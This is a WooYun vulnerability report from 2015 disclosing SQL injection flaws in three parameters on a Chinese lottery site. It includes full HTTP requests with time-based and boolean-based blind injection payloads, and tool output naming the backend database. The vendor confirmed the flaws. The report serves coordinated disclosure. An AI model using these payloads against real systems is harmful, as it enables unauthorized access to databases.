当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113093

漏洞标题:乐彩网某站SQL注入打包

相关厂商:乐彩网

漏洞作者: 紫霞仙子

提交时间:2015-05-11 17:05

修复时间:2015-06-30 08:14

公开时间:2015-06-30 08:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-16: 厂商已经确认,细节仅向厂商公开
2015-05-26: 细节向核心白帽子及相关领域专家公开
2015-06-05: 细节向普通白帽子公开
2015-06-15: 细节向实习白帽子公开
2015-06-30: 细节向公众公开

简要描述:

233

详细说明:

1.参数q1,q2
POST /3d/3Dallresult.php HTTP/1.1
Content-Length: 505
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: web2.17500.cn
Cookie: PHPSESSID=4kfc3k93kgcg4st491mmadv145
Host: web2.17500.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
submit=%b2%e9%bf%b4%cd%b3%bc%c6%b1%ed&action=submitted&action1=%b0%d9%ce%bb&action10=%b4%f3%d0%a1&action11=%b4%f3%d6%d0%d0%a1&action12=%d6%ca%ba%cf&action13=012%c2%b7&action14=%b0%bc%cd%b9&action2=%ca%ae%ce%bb&action3=%b8%f6%ce%bb&action4=%ba%cd%d6%b5&action5=%ba%cf%d6%b5&action6=%bf%e7%be%e0&action7=%c1%ac%ba%c5&action8=%b3%c9%b6%d4&action9=%c6%e6%c5%bc&q1=2015092&q2=2015093
2. 参数issue
GET /3d/p3_showpub.php?issue=if(now()%3dsysdate()%2csleep(0)%2c0) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: web2.17500.cn
Cookie: PHPSESSID=4kfc3k93kgcg4st491mmadv145
Host: web2.17500.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
payload:
issue='XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
issue='XOR(if(now()%3dsysdate()%2csleep(3)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
3.参数id
GET /800/nr2.php?id=47881%20AND%203*2*1%3d6%20AND%20370%3d370 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: web2.17500.cn
Cookie: PHPSESSID=4kfc3k93kgcg4st491mmadv145
Host: web2.17500.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
payload:
id=47881%20AND%203*2*1%3d6%20AND%20370%3d370
id=47881%20AND%203*2*2%3d6%20AND%20370%3d370

漏洞证明:

Parameter: q2 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: submit=%b2%e9%bf%b4%cd%b3%bc%c6%b1%ed&action=submitted&action1=%b0%d9%ce%bb&action10=%b4%f3%d0%a1&action11=%b4%f3%d6%d0%d0%a1&action12=%d6%ca%ba%cf&action13=012%c2%b7&action14=%b0%bc%cd%b9&action2=%ca%ae%ce%bb&action3=%b8%f6%ce%bb&action4=%ba%cd%d6%b5&action5=%ba%cf%d6%b5&action6=%bf%e7%be%e0&action7=%c1%ac%ba%c5&action8=%b3%c9%b6%d4&action9=%c6%e6%c5%bc&q1=2015092&q2=2015093' AND 9465=9465 AND 'FRxL'='FRxL
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: submit=%b2%e9%bf%b4%cd%b3%bc%c6%b1%ed&action=submitted&action1=%b0%d9%ce%bb&action10=%b4%f3%d0%a1&action11=%b4%f3%d6%d0%d0%a1&action12=%d6%ca%ba%cf&action13=012%c2%b7&action14=%b0%bc%cd%b9&action2=%ca%ae%ce%bb&action3=%b8%f6%ce%bb&action4=%ba%cd%d6%b5&action5=%ba%cf%d6%b5&action6=%bf%e7%be%e0&action7=%c1%ac%ba%c5&action8=%b3%c9%b6%d4&action9=%c6%e6%c5%bc&q1=2015092&q2=-8178' OR 7729=SLEEP(5) AND 'AMmE'='AMmE
---
back-end DBMS: MySQL 5.0.11
available databases [1]:
[*] cnlot2004

修复方案:

~~过滤不能解决问题!

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-05-16 08:12

厂商回复:

谢谢提供的漏洞信息,我们仔细查查。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-11 18:25 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    求一手环!